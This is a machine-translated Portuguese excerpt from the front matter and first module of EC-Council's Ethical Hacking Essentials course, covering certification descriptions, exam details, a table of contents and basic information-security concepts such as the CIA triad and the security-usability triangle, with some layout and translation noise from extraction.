EHE PT BR

Machine Translated by Google
EC-Council
CE-Conselho
MT
E
Ethical
HE
Hacking Essentials
Ético Fundamentos de Hacking
SÉRIE PROFISSIONAL
ec-council
currículos oficiais do ec-conselho
Hacking ético
Essenciais
Versão 1
CE-Conselho
EC-Council
Copyright © 2021 por EC-Council. Todos os direitos reservados. Exceto conforme permitido pela Lei de Direitos Autorais de 1976, nenhuma parte
desta publicação pode ser reproduzida ou distribuída de qualquer forma ou por qualquer meio, ou armazenada em um banco de dados ou sistema
de recuperação, sem a permissão prévia por escrito do editor, com exceção de que as listas de programas podem ser inseridas, armazenadas e
executadas em um sistema de computador, mas não podem ser reproduzidas para publicação sem a permissão prévia por escrito do editor, exceto
no caso de breves citações incluídas em resenhas críticas e outros usos não comerciais permitidos pela lei de direitos autorais. Para solicitações de
permissão, escreva para EC-Council, endereçado “Atenção: EC-Council,” no endereço abaixo:
EC-Council New Mexico

101C Sun Avenue NE
Albuquerque, NM 87109
As informações contidas nesta publicação foram obtidas pelo EC-Council de fontes consideradas confiáveis. O Conselho da CE toma medidas
razoáveis para garantir que o conteúdo seja atual e preciso; no entanto, devido à possibilidade de erro humano ou mecânico, não garantimos a
precisão, adequação ou integridade de qualquer informação e não somos responsáveis por quaisquer erros ou omissões nem pela precisão dos
resultados obtidos com o uso de tais informações.
O material didático é resultado de extensa pesquisa e contribuições de especialistas no assunto de todo o mundo. Os devidos créditos por todas
essas contribuições e referências são fornecidos no material didático nas notas finais da pesquisa.
Estamos empenhados em proteger os direitos de propriedade intelectual. Se você for um proprietário de direitos autorais (um licenciado exclusivo ou
seu agente) e acreditar que qualquer parte do curso constitui uma violação de direitos autorais ou uma violação de uma licença ou contrato acordado,
notifique-nos em legal@eccouncil.org. Em caso de reclamação fundamentada, o EC Council removerá o material em questão e fará as retificações
necessárias.
O material didático pode conter referências a outros recursos de informação e soluções de segurança, mas tais referências não devem ser
consideradas como um endosso ou recomendação do EC-Council.
Os leitores são incentivados a relatar erros, omissões e imprecisões ao EC-Council em legal@eccouncil.org. Se você tiver algum problema, entre
em contato conosco em support@eccouncil.org.
AVISO AO LEITOR
O EC-Council não garante nenhum dos produtos, metodologias ou estruturas aqui descritos, nem realiza nenhuma análise independente em conexão
com qualquer informação do produto aqui contida. O EC Council não assume e se isenta expressamente de qualquer obrigação de obter e incluir
informações além daquelas fornecidas pelo fabricante. O leitor é expressamente alertado para considerar e adotar todas as precauções de segurança
que possam ser indicadas pelas atividades aqui descritas e para evitar todos os perigos potenciais. Ao seguir as instruções aqui contidas, o leitor
assume voluntariamente todos os riscos relacionados a tais instruções. O EC-Council não faz representações ou garantias de qualquer tipo, incluindo,
mas não se limitando às garantias de adequação a um propósito específico ou comercialização, nem tais representações estão implícitas com relação
ao material aqui estabelecido, e o EC Council não assume nenhuma responsabilidade com relação a tal material. O EC-Council não será responsável
por quaisquer danos especiais, consequentes ou exemplares resultantes, no todo ou em parte, do uso ou confiança deste material pelo leitor.
Página II Ethical Hacking Essentials Copyright © por EC-Council Todos os

direitos reservados. A reprodução é estritamente proibida.
Prefácio
A segurança da informação refere-se à proteção de dados e sistemas de informação contra acesso não autorizado,
uso não autorizado, uso indevido, destruição ou alteração. O objetivo da segurança da informação é proteger a
confidencialidade, integridade e disponibilidade da informação digital.
A segurança da informação desempenha um papel vital em todas as organizações. É um estado de coisas em que
a informação, o processamento da informação e a comunicação são protegidos contra a confidencialidade,
integridade e disponibilidade da informação e do processamento da informação. Nas comunicações, a segurança
da informação também abrange a autenticação fidedigna das mensagens que abrangem a identificação das partes,
verificando e registrando a aprovação e autorização da informação, a não alteração dos dados e o não repúdio da
comunicação ou dos dados armazenados.
A segurança da informação é um dos elementos necessários que constituem a qualidade da informação e dos
sistemas de informação. Precaução aos riscos de segurança da informação e adoção de medidas de segurança da
informação adequadas e suficientes fazem parte da boa prática de processamento de informações exigidas em
particular pelas leis de proteção de dados e, de forma mais ampla, parte da boa prática de gestão da informação.
O programa Ethical Hacking Essentials (EHE) abrange os conceitos fundamentais de segurança da informação e
hacking ético. Ele equipa os alunos com as habilidades necessárias para identificar as crescentes ameaças à
segurança da informação que refletem na postura de segurança da organização e implementam controles gerais de
segurança.
Este programa oferece uma visão holística dos principais componentes da segurança da informação. O curso foi
desenvolvido para aqueles interessados em aprender os vários fundamentos da segurança da informação e hacking
ético e aspiram seguir uma carreira em segurança da informação.
Página III Ethical Hacking Essentials Copyright © por EC-Council Todos os

Sobre o EC-Council
O Conselho Internacional de Consultores de Comércio Eletrônico, mais conhecido como EC-Council, foi fundado
no final de 2001 para atender à necessidade de segurança da informação e profissionais de e-business bem
formados e certificados. O EC-Council é uma organização global baseada em membros composta por especialistas
da indústria e no assunto que trabalham juntos para definir os padrões e elevar o padrão em certificação e
educação em segurança da informação.
O EC-Council desenvolveu pela primeira vez o programa Certified Ethical Hacker (C|EH) com o objetivo de ensinar
as metodologias, ferramentas e técnicas usadas pelos hackers. Aproveitando o conhecimento coletivo de centenas
de especialistas no assunto, o programa CEH ganhou popularidade rapidamente em todo o mundo e agora é
oferecido em mais de 145 países por mais de 950 centros de treinamento autorizados. É considerado a referência
para muitas entidades governamentais e grandes corporações em todo o mundo.
O EC-Council, por meio de sua impressionante rede de profissionais e muitos seguidores da indústria, também
desenvolveu uma série de outros programas líderes em segurança da informação e e-business. As certificações
EC-Council são vistas como as certificações essenciais necessárias quando a configuração padrão e os cursos
de política de segurança ficam aquém. Fornecendo uma abordagem tática verdadeira e prática para a segurança,
os indivíduos armados com o conhecimento disseminado pelos programas do EC-Council estão fortalecendo as
redes de segurança em todo o mundo e derrotando os hackers em seu próprio jogo.
Outros programas do EC-Council

Conscientização sobre segurança: usuário certificado de computador seguro
O objetivo do programa de treinamento da CSCU é fornecer aos alunos o

conhecimento e as habilidades necessárias para proteger seus ativos de informação.
Esta aula imergirá os alunos em um ambiente de aprendizado interativo, onde
adquirirão conhecimentos fundamentais sobre várias ameaças de segurança de
computadores e redes, como roubo de identidade, fraude de cartão de crédito,
golpes de phishing bancário on-line, vírus e backdoors, trotes por e-mail, predadores sexuais e outras ameaças
on-line. , perda de informações confidenciais, ataques de hackers e engenharia social.
Mais importante ainda, as habilidades aprendidas na aula ajudam os alunos a tomar as medidas necessárias para
mitigar sua exposição à segurança.
Defesa de Rede: Defensor de Rede Certificado
Os alunos matriculados no curso Certified Network Defender obterão uma compreensão

detalhada da defesa de rede e desenvolverão sua experiência prática para atuar em
situações de defesa de rede da vida real. Eles obterão a profundidade do conhecimento
técnico necessário para projetar ativamente uma rede segura em sua organização.
Este curso fornece uma compreensão fundamental da verdadeira natureza da
transferência de dados, tecnologias de rede e tecnologias de software para que os alunos possam entender como
as redes operam, como o software de automação se comporta e como analisar redes e sua defesa.
Página IV Ethical Hacking Essentials Copyright © por EC-Council Todos os

Os alunos aprenderão como proteger, detectar e responder aos ataques de rede, bem como aprender sobre os
fundamentos da defesa de rede, a aplicação de controles de segurança de rede, protocolos, dispositivos de
perímetro, IDS seguro, VPN e configuração de firewall. Os alunos também aprenderão as complexidades da
assinatura, análise e varredura de vulnerabilidades do tráfego de rede, o que ajudará a projetar políticas de
segurança de rede aprimoradas e planos de resposta a incidentes bem-sucedidos. Essas habilidades ajudarão as
organizações a promover a resiliência e a continuidade operacional durante os ataques.
Hacking ético: Hacker ético certificado

A credencial Certified Ethical Hacker (CEH) é a certificação e realização de hacking
ético mais confiável recomendada por empregadores em todo o mundo. É a certificação
de segurança da informação mais desejada e representa uma das credenciais
cibernéticas de crescimento mais rápido exigidas por infraestrutura crítica e provedores
de serviços essenciais. Desde a introdução do CEH em 2003, ele é reconhecido como
um padrão na comunidade de segurança da informação. A CEH continua a apresentar
as mais recentes técnicas de hacking e as mais avançadas ferramentas de hacking e explorações usadas por
hackers e profissionais de segurança da informação atualmente. As cinco fases do hacking ético e a missão central
original do CEH permanecem válidas e relevantes hoje: “Para vencer um hacker, você precisa pensar como um
hacker”.
O CEH fornece uma compreensão profunda das fases de hacking ético, vários vetores de ataque e contramedidas
preventivas. Ele ensinará como os hackers pensam e agem de forma maliciosa, para que você fique mais bem
posicionado para configurar sua infraestrutura de segurança e se defender de ataques futuros.
Compreender as fraquezas e vulnerabilidades do sistema ajuda as organizações a fortalecer seus controles de
segurança do sistema para minimizar o risco de um incidente.
O CEH foi construído para incorporar um ambiente prático e um processo sistemático em todos os domínios e
metodologias de hacking ético, dando a você a oportunidade de trabalhar para provar o conhecimento e as
habilidades necessárias para realizar o trabalho de um hacker ético. Você será exposto a uma postura totalmente
diferente em relação às responsabilidades e medidas necessárias para estar seguro.
Teste de penetração: Profissional certificado em testes de penetração

A certificação CPENT exige que você demonstre a aplicação de técnicas
avançadas de teste de penetração, como ataques avançados do Windows,
ataques a sistemas IOT, exploração avançada de binários, escrita de exploits,
desvio de uma rede filtrada, teste de penetração de Tecnologia Operacional (OT),
acesso a redes ocultas com pivô e duplo pivotagem, escalonamento de privilégios
e evasão de mecanismos de defesa.
O CPENT do EC-Council padroniza a base de conhecimento para profissionais de teste de penetração, incorporando
as melhores práticas seguidas por especialistas experientes na área. O objetivo do CPENT é assegurar que cada
profissional segue um rigoroso código de ética, está exposto às melhores práticas no domínio dos testes de
penetração e conhece todos os requisitos de compliance exigidos pela indústria.
Página V Ethical Hacking Essentials Copyright © por EC-Council Todos os

Ao contrário de uma certificação de segurança normal, a credencial CPENT fornece uma garantia de que os
profissionais de segurança possuem habilidades para analisar exaustivamente a postura de segurança de uma
rede e recomendar medidas corretivas com autoridade. Por muitos anos, o EC-Council vem certificando profissionais
de segurança de TI em todo o mundo para garantir que esses profissionais sejam proficientes em mecanismos de
defesa de segurança de rede. As credenciais do EC-Council atestam seu profissionalismo e experiência, tornando
esses profissionais mais procurados por organizações e empresas de consultoria em todo o mundo.
Computação forense: Investigador forense de hacking de computador

Computer Hacking Forensic Investigator (CHFI) é um curso abrangente que abrange
os principais cenários de investigação forense. Ele permite que os alunos adquiram
experiência prática crucial com várias técnicas de investigação forense. Os alunos
aprendem como utilizar ferramentas forenses padrão para realizar com sucesso
uma investigação forense de computador, preparando-os para melhor auxiliar na
acusação de perpetradores.
O CHFI do EC-Council certifica indivíduos na disciplina de segurança específica de computação forense de uma
perspectiva neutra de fornecedor. A certificação CHFI reforça o conhecimento aplicado do pessoal de aplicação da
lei, administradores de sistema, oficiais de segurança, defesa e pessoal militar, profissionais jurídicos, banqueiros,
profissionais de segurança e qualquer pessoa preocupada com a integridade das infraestruturas de rede.
Tratamento de Incidentes: Manipulador de Incidentes Certificado pelo EC-Council
O programa Certified Incident Handler (E|CIH) do EC-Council foi projetado

e desenvolvido em colaboração com profissionais de segurança cibernética
e tratamento e resposta a incidentes em todo o mundo. É um programa
abrangente de nível especializado que transmite conhecimentos e
habilidades que as organizações precisam para lidar com as consequências
pós-violação de forma eficaz, reduzindo o impacto do incidente, tanto do ponto de vista financeiro quanto da
reputação.
O E|CIH é um programa orientado a métodos que usa uma abordagem holística para abranger vastos conceitos
relativos ao tratamento e resposta de incidentes organizacionais, desde a preparação e planejamento do processo
de resposta ao tratamento de incidentes até a recuperação de ativos organizacionais após um incidente de segurança.
Esses conceitos são essenciais para lidar e responder a incidentes de segurança para proteger as organizações de
futuras ameaças ou ataques.
Gestão: Chief Information Security Officer certificado

O programa Certified Chief Information Security Officer (CCISO) foi desenvolvido
pelo EC-Council para preencher uma lacuna de conhecimento no setor de segurança
da informação. A maioria das certificações de segurança da informação se concentra
em ferramentas específicas ou recursos profissionais. Quando o programa CCISO foi
Página VI Ethical Hacking Essentials Copyright © por EC-Council Todos os

desenvolvido, não existia nenhuma certificação para reconhecer o conhecimento, as habilidades e as aptidões
necessárias para um profissional de segurança da informação experiente desempenhar as funções de um CISO de
forma eficaz e competente. Na verdade, naquela época, muitas dúvidas existiam sobre o que realmente era um CISO
e o valor que essa função agregava a uma organização.
O CCISO Body of Knowledge ajuda a definir o papel do CISO e a delinear claramente as contribuições que essa
pessoa faz em uma organização. O EC-Council aprimora essas informações por meio de oportunidades de treinamento
conduzidas como módulos de autoestudo ou conduzidos por instrutores para garantir que os candidatos tenham uma
compreensão completa da função. O EC-Council avalia o conhecimento dos candidatos ao CCISO com um exame
rigoroso que testa sua competência em cinco domínios com os quais um líder de segurança experiente deve estar
familiarizado.
Segurança de aplicativos: Engenheiro de segurança de aplicativos certificado
A credencial Certified Application Security Engineer

(CASE) é desenvolvida em parceria com grandes
especialistas em desenvolvimento de aplicativos e
software em todo o mundo.
A credencial CASE testa as habilidades e
conhecimentos críticos de segurança necessários
ao longo de um típico ciclo de vida de desenvolvimento de software (SDLC), com foco na importância da implementação
de metodologias e práticas seguras no ambiente operacional inseguro de hoje.
O programa de treinamento certificado pela CASE é desenvolvido simultaneamente para preparar profissionais de
software com os recursos necessários esperados por empregadores e acadêmicos em todo o mundo. Ele foi projetado
para ser um curso prático e abrangente de segurança de aplicativos que ajudará os profissionais de software a criar
aplicativos seguros. O programa de treinamento abrange atividades de segurança envolvidas em todas as fases do
Ciclo de Vida de Desenvolvimento de Software (SDLC): planejamento, criação, teste e implantação de um aplicativo.
Ao contrário de outros treinamentos de segurança de aplicativos, o CASE vai além de apenas as diretrizes sobre
práticas de codificação segura e inclui coleta segura de requisitos, design robusto de aplicativos e tratamento de
problemas de segurança nas fases pós-desenvolvimento do desenvolvimento de aplicativos. Isso faz da CASE uma
das certificações mais abrangentes do mercado atualmente. É desejado por engenheiros de aplicativos de software,
analistas e testadores em todo o mundo e respeitado pelas autoridades contratantes.
Tratamento de Incidentes: Analista de Inteligência de Ameaças Certificado
O Certified Threat Intelligence Analyst (C|TIA) foi projetado e desenvolvido em

colaboração com especialistas em segurança cibernética e inteligência de ameaças
em todo o mundo para ajudar as organizações a identificar e mitigar riscos de
negócios, convertendo ameaças internas e externas desconhecidas em ameaças
conhecidas. É um programa abrangente de nível especializado que ensina uma
abordagem estruturada para a construção de inteligência de ameaças eficaz.
Página VII Ethical Hacking Essentials Copyright © por EC-Council Todos os

No cenário de ameaças em constante mudança, o C|TIA é um programa de treinamento essencial em Threat

Intelligence para aqueles que lidam diariamente com ameaças cibernéticas. Atualmente, as organizações exigem
um analista de inteligência de ameaças de segurança cibernética de nível profissional que possa extrair a
inteligência dos dados implementando várias estratégias avançadas. Esses programas de treinamento de
inteligência de ameaças de nível profissional só podem ser alcançados quando o núcleo dos currículos mapeia
e é compatível com as estruturas de inteligência de ameaças publicadas pelo governo e pelo setor.
Tratamento de Incidentes: Analista SOC Certificado
O programa Certified SOC Analyst (CSA) é o primeiro passo para ingressar em um

centro de operações de segurança (SOC). Ele é projetado para analistas SOC Tier
I e Tier II atuais e aspirantes para obter proficiência na execução de operações de
nível básico e intermediário.
O CSA é um programa de treinamento e credenciamento que ajuda o candidato a
adquirir habilidades técnicas de tendências e sob demanda por meio de instruções
de alguns dos instrutores mais experientes do setor. O programa se concentra na criação de novas oportunidades
de carreira por meio de conhecimento extenso e meticuloso com recursos de nível aprimorado para contribuir
dinamicamente para uma equipe SOC. Sendo um programa intenso de 3 dias, cobre completamente os
fundamentos das operações SOC, antes de transmitir o conhecimento de gerenciamento e correlação de logs,
implantação de SIEM, detecção avançada de incidentes e resposta a incidentes. Além disso, o candidato
aprenderá a gerenciar vários processos SOC e colaborar com o CSIRT no momento da necessidade.
Página VIII Ethical Hacking Essentials Copyright © por EC-Council Todos os

Informações do Exame EHE
Detalhes do Exame EHE
Título do exame Princípios Básicos de Hacking Ético (EHE)
Código do exame 112-52
Disponibilidade EC-Council Exam Portal (visite https://www.eccexam.com)
Duração 2 horas
Questões 75
Pontuação de aprovação 70%
Página IX Ethical Hacking Essentials Copyright © por EC-Council Todos os

Índice
Módulo 01: Fundamentos de Segurança da Informação 1
Fundamentos de Segurança da Informação 3
Leis e regulamentos de segurança da informação 18
Módulo 02: Fundamentos do Hacking Ético 39
Metodologia Cyber Kill Chain 41
Conceitos de Hacking e Classes de Hacker 54
Diferentes fases do ciclo de hacking 61
Conceitos, escopo e limitações do hacking ético 69
Ferramentas de hacking ético 78
Módulo 03: Ameaças à Segurança da Informação e Avaliação de Vulnerabilidade 95

Ameaças e fontes de ameaças 97
Malware e seus tipos 103

Vulnerabilidades 185
Avaliação de vulnerabilidade 196
Módulo 04: Técnicas de quebra de senha e contramedidas 227
Técnicas de quebra de senha 229
Ferramentas de quebra de senha 252
Contramedidas de quebra de senha 257
Módulo 05: Técnicas de Engenharia Social e Contramedidas 261
Conceitos de Engenharia Social e suas Fases 263
Técnicas de Engenharia Social 275
Ameaças internas e roubo de identidade 303
Contramedidas de Engenharia Social 314
Módulo 06: Ataques e contramedidas em nível de rede 331
cheirando 333
Conceitos de detecção de pacotes 334
Técnicas de Cheiro 347
Cheirar Contramedidas 360

Negação de serviço 367
Página X Ethical Hacking Essentials Copyright © por EC-Council Todos os

Ataques DoS e DDoS 368
Contramedidas de ataque DoS e DDoS 391
Sequestro de Sessão 395
Ataques de Sequestro de Sessão 396
Contramedidas de ataque de sequestro de sessão 411
Módulo 07: Ataques e contramedidas de aplicativos da Web 419
Ataques de Servidor Web 422
Ataques de Servidor Web 423
Contramedidas de ataque ao servidor da Web 456
Ataques de aplicativos da Web 461
Arquitetura de aplicativos da Web e pilha de vulnerabilidades 462
Ameaças e ataques de aplicativos da Web 475
Contramedidas de ataque a aplicativos da Web 503
Ataques de injeção SQL 514
Ataques de injeção SQL 515
Contramedidas de ataque de injeção de SQL 539
Módulo 08: Ataques sem fio e contramedidas 545
Terminologia sem fio 547
Criptografia sem fio 558
Técnicas de ataque específicas para redes sem fio 572
Ataques Bluetooth 600
Contramedidas de ataque sem fio 611
Módulo 09: Ataques móveis e contramedidas 619
Anatomia de ataque móvel 621
Vetores e vulnerabilidades de ataque de plataforma móvel 635
Conceito de gerenciamento de dispositivos móveis (MDM) 660
Contramedidas de ataque móvel 667
Módulo 10: Ataques e contramedidas IoT e OT 677
Ataques IoT 680
Conceitos de IoT 681
Ameaças e ataques de IoT 690
Contramedidas de ataque IoT 719
Página XI Ethical Hacking Essentials Copyright © por EC-Council Todos os

Ataques OT 724
Conceitos OT 725
Ameaças e Ataques OT 735
Contramedidas de Ataque OT 755
Módulo 11: Ameaças e contramedidas da computação em nuvem 761
Conceitos de computação em nuvem 763
Tecnologia de Contêineres 789
Ameaças de computação em nuvem 815
Contramedidas de ataque em nuvem 842
Módulo 12: Fundamentos do teste de penetração 851
Fundamentos do teste de penetração e seus benefícios 853
Estratégias e fases do teste de penetração 862
Diretrizes e recomendações para testes de penetração 870
Glossário 889
Referências 903
Página XII Ethical Hacking Essentials Copyright © por EC-Council Todos os

MT
EC-Council
CE-Conselho
E
Ethical
HE
Hacking Essentials
Módulo 01
F un da m e n t o s d e S e g u r a nç a d a I nf or m a ç ã o
Fundamentos de Hacking Ético Exame 112-52

Fundamentos de Segurança da Informação
Objetivos do Módulo
Ideia criativa
1 Compreendendo a necessidade de segurança
Compreendendo os Elementos de Informação

2
Segurança
Noções básicas sobre segurança, funcionalidade e

3
Triângulo de Usabilidade
Compreendendo os motivos, metas e objetivos dos ataques à

4
segurança da informação
5 Visão geral da classificação de ataques
6 Visão geral dos vetores de ataque à segurança da informação
Visão geral de várias leis de segurança da informação e

7
regulamentos
Copyright © por EC-Council. Todos os direitos reservados. A reprodução é estritamente proibida.
Objetivos do módulo
Os invasores invadem os sistemas por vários motivos. Portanto, é importante entender como e por que hackers mal-
intencionados atacam e exploram sistemas. Como afirma Sun Tzu em A Arte da Guerra: “Se você se conhece, mas
não conhece o inimigo, para cada vitória conquistada, você também sofrerá uma derrota”.
Os profissionais de segurança devem proteger sua infraestrutura contra exploits conhecendo o inimigo — o(s)
hacker(es) mal-intencionado(s)—que procura(m) usar a mesma infraestrutura para atividades ilegais.
Este módulo começa com uma visão geral da necessidade de segurança e dos vetores de ameaças emergentes. Ele
fornece uma visão sobre os diferentes elementos da segurança da informação. Posteriormente, o módulo discute os
tipos e classes de ataques e termina com uma breve discussão sobre leis e regulamentos de segurança da informação.
No final deste módulo, você será capaz de fazer o seguinte:
ÿ Compreender a necessidade de segurança
ÿ Descrever os elementos de segurança da informação
ÿ Descrever o triângulo de segurança, funcionalidade e usabilidade
ÿ Explicar os motivos, metas e objetivos dos ataques à segurança da informação
ÿ Explicar a classificação dos ataques
ÿ Descrever os vetores de ataque à segurança da informação
ÿ Conhecer as leis e regulamentos de segurança da informação
Módulo 01 Página 2 Ethical Hacking Essentials Copyright © por EC-Council Todos

os direitos reservados. A reprodução é estritamente proibida.

Fluxo do módulo
Discutir informações
Fundamentos de segurança
Discutir vários
Segurança da informação
Leis e regulamentos
Discuta os fundamentos da segurança da informação

A informação é um ativo crítico que as organizações devem proteger. Se as informações confidenciais de
uma organização caírem em mãos erradas, a organização poderá sofrer perdas consideráveis em termos
financeiros, reputação da marca ou clientes, ou de outras formas. Para fornecer uma compreensão de
como proteger tais recursos de informação crítica, este módulo começa com uma visão geral da segurança
da informação.
Esta seção apresenta a necessidade de segurança; os elementos de segurança da informação; o triângulo

de segurança, funcionalidade e usabilidade; motivos, metas e objetivos dos ataques à segurança da
informação; classificação de ataques; e vetores de ataque à segurança da informação.


O que é Segurança da
Informação?
A segurança da informação é um estado de bem-estar da

informação e da infraestrutura em que a possibilidade de roubo,
adulteração e interrupção de informações e serviços é baixa ou tolerável
O que é Segurança da Informação?

A segurança da informação é “o estado de bem-estar da informação e infraestrutura em que a
possibilidade de roubo, adulteração ou interrupção de informações e serviços é mantida baixa ou tolerável”.
A segurança da informação refere-se à proteção ou proteção de informações e sistemas de
informação que usam, armazenam e transmitem informações contra acesso não autorizado,
divulgação, alteração e destruição.


Necessidade de segurança
Evolução da tecnologia, focada na facilidade

de uso 01
Confie no uso de computadores para acessar,

fornecer ou apenas armazenar informações
02
Maior ambiente de rede e aplicativos

baseados em rede
03
Impacto direto da violação de segurança

na base de ativos corporativos e ágio
04
Complexidade crescente da
administração e gerenciamento da infraestrutura de computadores
05
Necessidade de segurança
Hoje, as organizações dependem cada vez mais de redes de computação porque usuários e funcionários esperam trocar
informações na velocidade do pensamento. Além disso, com a evolução da tecnologia, houve um maior foco na facilidade
de uso. Tarefas rotineiras dependem do uso de computadores para acessar, fornecer ou apenas armazenar informações.
Porém, como os ativos de informação diferenciam a organização competitiva de outras do gênero, eles registram um
aumento em sua contribuição ao capital social? Há um senso de urgência em nome da organização para proteger esses
ativos de prováveis ameaças e vulnerabilidades. O assunto de abordar a segurança da informação é vasto e é o esforço
deste curso fornecer ao aluno um corpo de conhecimento abrangente necessário para proteger os ativos de informação sob
sua consideração.
Este curso assume que existem políticas organizacionais que são endossadas pela alta administração e que os objetivos e
metas de negócios relacionados à segurança foram incorporados à estratégia corporativa. Uma política de segurança é uma
especificação de como os objetos em um domínio de segurança podem interagir. A importância da segurança no cenário
contemporâneo de informação e telecomunicações não pode ser subestimada. Existem inúmeras razões para proteger a
infraestrutura de TIC. Inicialmente, os computadores foram projetados para facilitar a pesquisa, e isso não deu muita ênfase
à segurança, pois esses recursos, sendo escassos, foram feitos para compartilhamento. A penetração dos computadores
tanto no espaço de trabalho rotineiro quanto na vida diária levou a uma maior transferência de controle para os computadores
e a uma maior dependência deles para facilitar tarefas rotineiras importantes. Isso aumentou ainda mais o uso de ambientes
de rede e aplicativos baseados em rede. Quaisquer interrupções de rede significam perda de tempo, dinheiro e, às vezes,
até perda de vidas. Além disso, a crescente complexidade da administração e gerenciamento da infra-estrutura de
computadores está criando um impacto direto de brechas de segurança na base de ativos corporativos e no fundo de
comércio.


Elementos de Informação
Segurança
Confidencialidade Integridade Disponibilidade

Garantia de que o A confiabilidade dos dados ou Garantia de que os sistemas
informação é acessível recursos em termos de responsáveis por entregar, armazenar e
apenas para aqueles autorizados prevenir alterações processar informações estejam acessíveis
a ter acesso impróprias ou não autorizadas quando solicitados pelos usuários
autorizados
Autenticidade Não-Repúdio
Refere-se à característica de uma comunicação, Uma garantia de que o remetente de uma mensagem
documento ou qualquer dado que garanta a qualidade de não pode mais tarde negar ter enviado a mensagem e
ser genuíno que o destinatário não pode negar ter recebido a mensagem
Elementos de Segurança da Informação
A segurança da informação depende de cinco elementos principais: confidencialidade, integridade, disponibilidade, autenticidade
e não-repúdio.
ÿ Confidencialidade
Confidencialidade é a garantia de que a informação é acessível apenas a pessoas autorizadas.
Violações de confidencialidade podem ocorrer devido ao manuseio inadequado de dados ou uma tentativa de hacking.
Os controles de confidencialidade incluem classificação de dados, criptografia de dados e descarte adequado de
equipamentos (como DVDs, unidades USB, etc.).
ÿ Integridade
Integridade é a confiabilidade dos dados ou recursos na prevenção de alterações impróprias e não autorizadas – a
garantia de que as informações são suficientemente precisas para seu propósito. As medidas para manter a integridade
dos dados podem incluir uma soma de verificação (um número produzido por uma função matemática para verificar se
um determinado bloco de dados não foi alterado) e controle de acesso (que garante que apenas pessoas autorizadas
possam atualizar, adicionar ou excluir dados).
ÿ Disponibilidade
Disponibilidade é a garantia de que os sistemas responsáveis por entregar, armazenar e processar informações
estejam acessíveis quando solicitados por usuários autorizados. Medidas para manter a disponibilidade de dados
podem incluir matrizes de disco para sistemas redundantes e máquinas em cluster, software antivírus para combater
malware e sistemas de prevenção de negação de serviço distribuído (DDoS).


ÿ Autenticidade
Autenticidade refere-se à característica de comunicação, documentos ou quaisquer dados
que garantam a qualidade de serem genuínos ou incorruptos. A principal função da
autenticação é confirmar que um usuário é genuíno. Controles como biometria, cartões
inteligentes e certificados digitais garantem a autenticidade de dados, transações,
comunicações e documentos.
ÿ Não-Repúdio
O não-repúdio é uma forma de garantir que o remetente de uma mensagem não possa mais
tarde negar ter enviado a mensagem e que o destinatário não possa negar ter recebido a
mensagem. Indivíduos e organizações usam assinaturas digitais para garantir o não repúdio.


A segurança, funcionalidade e
Triângulo de Usabilidade
O nível de segurança em qualquer sistema pode ser definido pela

força de três componentes:
Mover a bola em direção à

Funcionalidade
segurança significa (Recursos)
menos funcionalidade e usabilidade
Segurança Usabilidade
(Restrições) (GUI)
O triângulo de segurança, funcionalidade e usabilidade
A tecnologia está evoluindo em um ritmo sem precedentes. Como resultado, os novos produtos no mercado
se concentram mais na facilidade de uso do que na computação segura. Embora a tecnologia tenha sido
originalmente desenvolvida para fins acadêmicos e de pesquisa “honestos”, ela não evoluiu no mesmo ritmo
que a proficiência do usuário. Além disso, nessa evolução, os projetistas de sistemas muitas vezes ignoram
as vulnerabilidades durante a implantação pretendida do sistema. No entanto, adicionar mais mecanismos de
segurança padrão integrados permite aos usuários mais competência. Com o aumento do uso de computadores
para um número cada vez maior de atividades rotineiras, fica difícil para os profissionais de segurança alocar
recursos exclusivamente para proteger sistemas. Isso inclui o tempo necessário para verificar arquivos de log,
detectar vulnerabilidades e aplicar patches de atualização de segurança.
As atividades rotineiras sozinhas consomem a maior parte do tempo dos profissionais do sistema, o que deixa
relativamente pouco tempo para uma administração vigilante ou para a implantação de medidas de segurança
para recursos de computação de forma regular e inovadora. Este fato tem aumentado a demanda por
profissionais de segurança dedicados a monitorar e defender constantemente os recursos de TIC (Tecnologia
da Informação e Comunicação).
Originalmente, “hackear” significava possuir habilidades extraordinárias de computação para explorar recursos
ocultos de sistemas de computador. No contexto da segurança da informação, o hacking é definido como a
exploração de vulnerabilidades de sistemas e redes de computadores e requer grande proficiência. No
entanto, ferramentas e códigos automatizados estão disponíveis hoje na Internet que tornam possível para
qualquer pessoa que possua a vontade de hackear ter sucesso. No entanto, o mero comprometimento da
segurança do sistema não denota o sucesso do hacking. Existem sites que insistem em “recuperar a Internet”
e também pessoas que acreditam estar fazendo um favor a todos ao postar detalhes de suas façanhas.


A facilidade com que as vulnerabilidades do sistema podem ser exploradas aumentou, enquanto a curva de
conhecimento necessária para realizar tais explorações diminuiu. O conceito de “super atacante” de elite é uma
ilusão. Um dos principais impedimentos do crescimento da infraestrutura de segurança reside na relutância das
vítimas exploradas ou comprometidas em relatar tais incidentes por medo de perder a boa vontade e a fé de seus
funcionários, clientes ou parceiros e/ou de perder mercado compartilhado. A tendência de os ativos de informação
influenciarem o mercado fez com que mais empresas pensassem duas vezes antes de relatar incidentes às
autoridades policiais por medo de “má imprensa” e publicidade negativa.
O ambiente cada vez mais conectado em rede, com as empresas frequentemente usando seus sites como pontos
únicos de contato além das fronteiras geográficas, torna essencial que os profissionais de segurança tomem
contramedidas para evitar exploits que podem resultar em perda de dados. É por isso que as empresas precisam
investir em medidas de segurança para proteger seus ativos de informação.
O nível de segurança em qualquer sistema pode ser definido pela força de três componentes:
ÿ Funcionalidade: O conjunto de recursos fornecidos pelo sistema.
ÿ Usabilidade: Os componentes GUI usados para projetar o sistema para facilidade de uso.
ÿ Segurança: Restrições impostas ao acesso aos componentes do sistema.
A relação entre esses três componentes é demonstrada usando um triângulo porque um aumento ou diminuição em
qualquer um dos componentes afeta automaticamente os outros dois componentes. Mover a bola em direção a
qualquer um dos três componentes significa diminuir a intensidade dos outros dois componentes.
O diagrama representa a relação entre funcionalidade, usabilidade e segurança. Por exemplo, conforme mostrado
na figura, se a bola se mover em direção à segurança, isso significa maior segurança e menor funcionalidade e
usabilidade. Se a bola estiver no centro do triângulo, todos os três componentes estão equilibrados. Se a bola se
mover em direção à usabilidade, isso levará a uma maior usabilidade e diminuição da funcionalidade, bem como da
segurança. Para qualquer implementação de controles de segurança, todos os três componentes devem ser
considerados cuidadosamente e equilibrados para obter funcionalidade e usabilidade aceitáveis com segurança
aceitável.
Figura 1.1: Triângulo de Segurança, Funcionalidade e Usabilidade


Desafios de segurança
Conformidade com as leis e Falta de profissionais de segurança Dificuldade em centralizar a segurança em

regulamentos governamentais cibernética qualificados e qualificados um ambiente de computação distribuída
